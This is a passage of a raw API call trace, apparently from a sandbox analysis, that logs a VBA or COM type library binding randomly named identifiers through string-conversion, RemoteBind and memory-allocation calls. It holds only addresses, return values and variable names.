CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f270e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="KPHsVttxfBg") returned 12 [0023.154] ITypeComp:RemoteBind (in: This=0x2876778, szName="KPHsVttxfBg", lHashVal=0x10c9b6, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x22c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x22c) returned 0x0 [0023.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f270e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="KPHsVttxfBg") returned 12 [0023.155] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="KPHsVttxfBg", lHashVal=0x10c9b6, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x22c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x22c) returned 0x0 [0023.155] CRetailMalloc_Alloc () returned 0x78b2f90 [0023.156] IUnknown:Release (This=0x2876548) returned 0x5 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2dee, cbMultiByte=19, lpWideCharStr=0x125374, cchWideChar=20 | out: lpWideCharStr="_B_var_KPHsVttxfBg") returned 19 [0023.156] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_KPHsVttxfBg", lHashVal=0x10bb18, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.156] CRetailMalloc_Free () returned 0x1ba0201 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797ef2, cbMultiByte=9, lpWideCharStr=0x45308fc, cchWideChar=20 | out: lpWideCharStr="RxzkKtCmM") returned 9 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f00, cbMultiByte=9, lpWideCharStr=0x453094c, cchWideChar=20 | out: lpWideCharStr="sVdsXBppZ") returned 9 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f10, cbMultiByte=9, lpWideCharStr=0x45309d4, cchWideChar=20 | out: lpWideCharStr="zFuyFtSWh") returned 9 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f20, cbMultiByte=9, lpWideCharStr=0x4530af0, cchWideChar=20 | out: lpWideCharStr="LtAYsKBMK") returned 9 [0023.156] CRetailMalloc_Alloc () returned 0x56ccac0 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f30, cbMultiByte=10, lpWideCharStr=0x4530c0c, cchWideChar=22 | out: lpWideCharStr="SsSyLtfYmy") returned 10 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f40, cbMultiByte=7, lpWideCharStr=0x4530d2a, cchWideChar=16 | out: lpWideCharStr="rGVxsLF") returned 7 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f4e, cbMultiByte=11, lpWideCharStr=0x4530e42, cchWideChar=24 | out: lpWideCharStr="EcekhReVpLT") returned 11 [0023.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2736, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="vSNPHwVDHVx") returned 12 [0023.157] ITypeComp:RemoteBind (in: This=0x2876550, szName="vSNPHwVDHVx", lHashVal=0x10615a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x22e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x22e) returned 0x0 [0023.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2736, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="vSNPHwVDHVx") returned 12 [0023.157] ITypeComp:RemoteBind (in: This=0x2875638, szName="vSNPHwVDHVx", lHashVal=0x10615a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x22e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x22e) returned 0x0 [0023.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2736, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="vSNPHwVDHVx") returned 12 [0023.157] ITypeComp:RemoteBind (in: This=0x2876778, szName="vSNPHwVDHVx", lHashVal=0x10615a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x22e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x22e) returned 0x0 [0023.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2736, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="vSNPHwVDHVx") returned 12 [0023.157] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="vSNPHwVDHVx", lHashVal=0x10615a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x22e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x22e) returned 0x0 [0023.157] CRetailMalloc_Alloc () returned 0x78b2f90 [0023.157] IUnknown:Release (This=0x2876548) returned 0x5 [0023.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2e1e, cbMultiByte=19, lpWideCharStr=0x125374, cchWideChar=20 | out: lpWideCharStr="_B_var_vSNPHwVDHVx") returned 19 [0023.157] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_vSNPHwVDHVx", lHashVal=0x1052bc, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.158] CRetailMalloc_Free () returned 0x1ba0201 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f68, cbMultiByte=8, lpWideCharStr=0x45310d2, cchWideChar=18 | out: lpWideCharStr="FyAWuwyU") returned 8 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f74, cbMultiByte=7, lpWideCharStr=0x4531120, cchWideChar=16 | out: lpWideCharStr="RespRFT") returned 7 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f82, cbMultiByte=7, lpWideCharStr=0x45311a4, cchWideChar=16 | out: lpWideCharStr="czgPUeW") returned 7 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f90, cbMultiByte=7, lpWideCharStr=0x45312bc, cchWideChar=16 | out: lpWideCharStr="BUghykR") returned 7 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797f9e, cbMultiByte=8, lpWideCharStr=0x45313d4, cchWideChar=18 | out: lpWideCharStr="fYCWeHyS") returned 8 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797fac, cbMultiByte=11, lpWideCharStr=0x45314ee, cchWideChar=24 | out: lpWideCharStr="MCDwxvgssMW") returned 11 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797fbe, cbMultiByte=11, lpWideCharStr=0x453160e, cchWideChar=24 | out: lpWideCharStr="dKuCNTgWbfs") returned 11 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f275e, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="bepZFRv") returned 8 [0023.158] ITypeComp:RemoteBind (in: This=0x2876550, szName="bepZFRv", lHashVal=0x101db6, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x230 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x230) returned 0x0 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f275e, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="bepZFRv") returned 8 [0023.158] ITypeComp:RemoteBind (in: This=0x2875638, szName="bepZFRv", lHashVal=0x101db6, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x230 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x230) returned 0x0 [0023.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f275e, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="bepZFRv") returned 8 [0023.158] ITypeComp:RemoteBind (in: This=0x2876778, szName="bepZFRv", lHashVal=0x101db6, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x230 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x230) returned 0x0 [0023.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f275e, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="bepZFRv") returned 8 [0023.159] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="bepZFRv", lHashVal=0x101db6, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x230 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x230) returned 0x0 [0023.159] CRetailMalloc_Alloc () returned 0x786b818 [0023.159] IUnknown:Release (This=0x2876548) returned 0x5 [0023.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2e4e, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_bepZFRv") returned 15 [0023.159] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_bepZFRv", lHashVal=0x10213a, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.159] CRetailMalloc_Free () returned 0xef90001 [0023.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797fd8, cbMultiByte=11, lpWideCharStr=0x453189e, cchWideChar=24 | out: lpWideCharStr="XtCUWTDrmMv") returned 11 [0023.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797fe8, cbMultiByte=9, lpWideCharStr=0x45318f2, cchWideChar=20 | out: lpWideCharStr="MruufYeUR") returned 9 [0023.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797ff8, cbMultiByte=11, lpWideCharStr=0x453197a, cchWideChar=24 | out: lpWideCharStr="PymSCENgkWh") returned 11 [0023.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579800a, cbMultiByte=7, lpWideCharStr=0x4531a9a, cchWideChar=16 | out: lpWideCharStr="mNrCGdD") returned 7 [0023.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798018, cbMultiByte=8, lpWideCharStr=0x4531bb2, cchWideChar=18 | out: lpWideCharStr="gPDYdbBF") returned 8 [0023.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798026, cbMultiByte=11, lpWideCharStr=0x4531ccc, cchWideChar=24 | out: lpWideCharStr="kwUmUXGMRXn") returned 11 [0023.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798038, cbMultiByte=8, lpWideCharStr=0x4531dec, cchWideChar=18 | out: lpWideCharStr="wfGLRRHR") returned 8 [0023.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2782, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="cmbFMfzX") returned 9 [0023.160] ITypeComp:RemoteBind (in: This=0x2876550, szName="cmbFMfzX", lHashVal=0x10c679, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x232 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x232) returned 0x0 [0023.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2782, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="cmbFMfzX") returned 9 [0023.160] ITypeComp:RemoteBind (in: This=0x2875638, szName="cmbFMfzX", lHashVal=0x10c679, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x232 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x232) returned 0x0 [0023.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2782, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="cmbFMfzX") returned 9 [0023.160] ITypeComp:RemoteBind (in: This=0x2876778, szName="cmbFMfzX", lHashVal=0x10c679, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x232 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x232) returned 0x0 [0023.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2782, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="cmbFMfzX") returned 9 [0023.160] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="cmbFMfzX", lHashVal=0x10c679, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x232 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x232) returned 0x0 [0023.160] CRetailMalloc_Alloc () returned 0x786b818 [0023.161] IUnknown:Release (This=0x2876548) returned 0x5 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2e7a, cbMultiByte=16, lpWideCharStr=0x125374, cchWideChar=17 | out: lpWideCharStr="_B_var_cmbFMfzX") returned 16 [0023.161] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_cmbFMfzX", lHashVal=0x109e02, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.161] CRetailMalloc_Free () returned 0xef90001 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579804e, cbMultiByte=9, lpWideCharStr=0x4532076, cchWideChar=20 | out: lpWideCharStr="mvdTxDArt") returned 9 [0023.161] CRetailMalloc_Alloc () returned 0x56ccce8 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579805c, cbMultiByte=8, lpWideCharStr=0x45320c6, cchWideChar=18 | out: lpWideCharStr="nFSUzznK") returned 8 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579806a, cbMultiByte=7, lpWideCharStr=0x453214c, cchWideChar=16 | out: lpWideCharStr="gkuLNVz") returned 7 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798078, cbMultiByte=8, lpWideCharStr=0x4532264, cchWideChar=18 | out: lpWideCharStr="HxNCCTWX") returned 8 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798086, cbMultiByte=11, lpWideCharStr=0x453237e, cchWideChar=24 | out: lpWideCharStr="CHSvbdbdnyc") returned 11 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798098, cbMultiByte=11, lpWideCharStr=0x453249e, cchWideChar=24 | out: lpWideCharStr="TRDULTsMGwV") returned 11 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57980aa, cbMultiByte=7, lpWideCharStr=0x45325be, cchWideChar=16 | out: lpWideCharStr="BCGCBaK") returned 7 [0023.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27aa, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="mFeewxy") returned 8 [0023.161] ITypeComp:RemoteBind (in: This=0x2876550, szName="mFeewxy", lHashVal=0x10b4c9, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x234 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x234) returned 0x0 [0023.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27aa, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="mFeewxy") returned 8 [0023.162] ITypeComp:RemoteBind (in: This=0x2875638, szName="mFeewxy", lHashVal=0x10b4c9, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x234 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x234) returned 0x0 [0023.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27aa, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="mFeewxy") returned 8 [0023.162] ITypeComp:RemoteBind (in: This=0x2876778, szName="mFeewxy", lHashVal=0x10b4c9, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x234 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x234) returned 0x0 [0023.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27aa, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="mFeewxy") returned 8 [0023.162] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="mFeewxy", lHashVal=0x10b4c9, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x234 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x234) returned 0x0 [0023.162] CRetailMalloc_Alloc () returned 0x786b818 [0023.162] IUnknown:Release (This=0x2876548) returned 0x5 [0023.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2ea6, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_mFeewxy") returned 15 [0023.162] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_mFeewxy", lHashVal=0x10b84d, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.162] CRetailMalloc_Free () returned 0xef90001 [0023.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57980c0, cbMultiByte=9, lpWideCharStr=0x4532846, cchWideChar=20 | out: lpWideCharStr="AUSYGPHwv") returned 9 [0023.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57980ce, cbMultiByte=11, lpWideCharStr=0x4532896, cchWideChar=24 | out: lpWideCharStr="nBKyVvhfCYP") returned 11 [0023.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57980e0, cbMultiByte=7, lpWideCharStr=0x4532922, cchWideChar=16 | out: lpWideCharStr="AkRpekv") returned 7 [0023.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57980ee, cbMultiByte=8, lpWideCharStr=0x4532a3a, cchWideChar=18 | out: lpWideCharStr="AAPRMUNP") returned 8 [0023.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57980fc, cbMultiByte=10, lpWideCharStr=0x4532b54, cchWideChar=22 | out: lpWideCharStr="BUxhmvKchA") returned 10 [0023.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579810c, cbMultiByte=8, lpWideCharStr=0x4532c72, cchWideChar=18 | out: lpWideCharStr="VMNkMCHS") returned 8 [0023.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579811a, cbMultiByte=11, lpWideCharStr=0x4532d8c, cchWideChar=24 | out: lpWideCharStr="CgfMeYPhFzW") returned 11 [0023.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579812c, cbMultiByte=8, lpWideCharStr=0x4532eac, cchWideChar=18 | out: lpWideCharStr="wUGCYgCd") returned 8 [0023.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f26e6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="LXxeuxgW") returned 9 [0023.164] ITypeComp:RemoteBind (in: This=0x2876550, szName="LXxeuxgW", lHashVal=0x104edf, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x22a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x22a) returned 0x0 [0023.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f26e6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="LXxeuxgW") returned 9 [0023.164] ITypeComp:RemoteBind (in: This=0x2875638, szName="LXxeuxgW", lHashVal=0x104edf, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x22a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x22a) returned 0x0 [0023.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f26e6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="LXxeuxgW") returned 9 [0023.164] ITypeComp:RemoteBind (in: This=0x2876778, szName="LXxeuxgW", lHashVal=0x104edf, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x22a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x22a) returned 0x0 [0023.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f26e6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="LXxeuxgW") returned 9 [0023.164] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="LXxeuxgW", lHashVal=0x104edf, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x22a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x22a) returned 0x0 [0023.164] CRetailMalloc_Alloc () returned 0x786b818 [0023.165] IUnknown:Release (This=0x2876548) returned 0x5 [0023.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2ed2, cbMultiByte=16, lpWideCharStr=0x125374, cchWideChar=17 | out: lpWideCharStr="_B_var_LXxeuxgW") returned 16 [0023.165] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_LXxeuxgW", lHashVal=0x102668, wFlags=0x5, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.165] CRetailMalloc_Free () returned 0xef90001 [0023.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798144, cbMultiByte=7, lpWideCharStr=0x4540f44, cchWideChar=16 | out: lpWideCharStr="pguKBuA") returned 7 [0023.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798150, cbMultiByte=9, lpWideCharStr=0x4540f90, cchWideChar=20 | out: lpWideCharStr="fczercYgB") returned 9 [0023.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798160, cbMultiByte=11, lpWideCharStr=0x4541018, cchWideChar=24 | out: lpWideCharStr="mBEzKDtCnWW") returned 11 [0023.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798172, cbMultiByte=7, lpWideCharStr=0x45411b8, cchWideChar=16 | out: lpWideCharStr="ZCZXyAt") returned 7 [0023.165] CRetailMalloc_Alloc () returned 0x56ccf10 [0023.165] MultiByteToWideChar (in: CodePage=0x0, 